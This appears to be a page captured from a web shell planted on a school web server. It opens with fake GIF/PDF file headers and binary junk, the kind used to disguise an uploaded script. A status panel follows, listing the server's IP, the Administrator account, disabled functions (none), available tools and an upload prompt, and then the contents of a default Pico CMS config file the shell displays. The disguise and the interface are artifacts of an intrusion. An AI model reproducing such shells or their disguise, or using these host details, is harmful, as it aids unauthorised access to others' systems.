GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/Pico/config/ |
Upload File : |
<?php /** * Pico configuration * * This is the configuration file for {@link Pico}. It comes loaded with the * default values, which can be found in {@link Pico::getConfig()} (see * {@path "lib/Pico.php"}). * * To override any of the default settings below, copy this file to * {@path "config/config.php"}, uncomment the line, then make and * save your changes. * * @author Gilbert Pellegrom * @link http://picocms.org * @license http://opensource.org/licenses/MIT The MIT License * @version 1.0 */ /* * BASIC */ // $config['site_title'] = 'Pico'; // Site title // $config['base_url'] = ''; // Override base URL (e.g. http://example.com) // $config['rewrite_url'] = null; // A boolean indicating forced URL rewriting /* * THEME */ // $config['theme'] = 'default'; // Set the theme (defaults to "default") // $config['twig_config'] = array( // Twig settings // 'cache' => false, // To enable Twig caching change this to a path to a writable directory // 'autoescape' => false, // Auto-escape Twig vars // 'debug' => false // Enable Twig debug // ); /* * CONTENT */ // $config['date_format'] = '%D %T'; // Set the PHP date format as described here: http://php.net/manual/en/function.strftime.php // $config['pages_order_by'] = 'alpha'; // Order pages by "alpha" or "date" // $config['pages_order'] = 'asc'; // Order pages "asc" or "desc" // $config['content_dir'] = 'content-sample/'; // Content directory // $config['content_ext'] = '.md'; // File extension of content files to serve /* * TIMEZONE */ // $config['timezone'] = 'UTC'; // Timezone may be required by your php install /* * PLUGINS */ // $config['DummyPlugin.enabled'] = false; // Force DummyPlugin to be disabled /* * CUSTOM */ // $config['custom_setting'] = 'Hello'; // Can be accessed by {{ config.custom_setting }} in a theme